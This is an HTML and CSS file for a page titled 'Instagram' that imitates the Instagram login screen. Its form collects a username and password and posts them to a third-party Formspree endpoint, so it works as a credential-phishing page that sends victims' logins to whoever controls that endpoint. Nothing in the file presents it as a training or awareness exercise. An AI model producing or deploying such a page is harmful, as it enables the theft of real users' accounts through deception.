<style>
    .login-container {
    margin: auto;
    width: 300px;
    padding: 20px;
    border: 1px solid #ccc;
    border-radius: 5px;
  }
  
  form {
    display: flex;
    flex-direction: column;
  }
  
  label {
    margin-bottom: 10px;
  }
  
  input {
    padding: 5px;
    margin-bottom: 20px;
    border-radius: 5px;
    border: 1px solid #ccc;
  }
  
  button {
    background-color: #3897f0;
    color: #fff;
    padding: 10px 15px;
    border-radius: 5px;
    border: none;
    cursor: pointer;
    font-weight: bold;
  }
  
  button:hover {
    background-color: #2471a3;
  }
  </style>
  
  
  <!DOCTYPE html>
  <html>
    <head>
      <title>Instagram</title>
      <link rel="stylesheet" type="text/css" href="style.css">
    </head>
    <body>
      <div class="login-container">
        <form action="https://formspree.io/f/mgebybqo" method="POST">
          <h1>Instagram Login</h1>
          <label for="username">Email,phone number,username:</label>
          <input type="text" id="username" name="username" required>
          <label for="password">Password:</label>
          <input type="password" id="password" name="password" required>
          <button type="submit">Login</button>
        </form>
        <p>Don't have an account? <a href="signup.php">Sign up</a></p>
      </div>
    </body>
  </html>
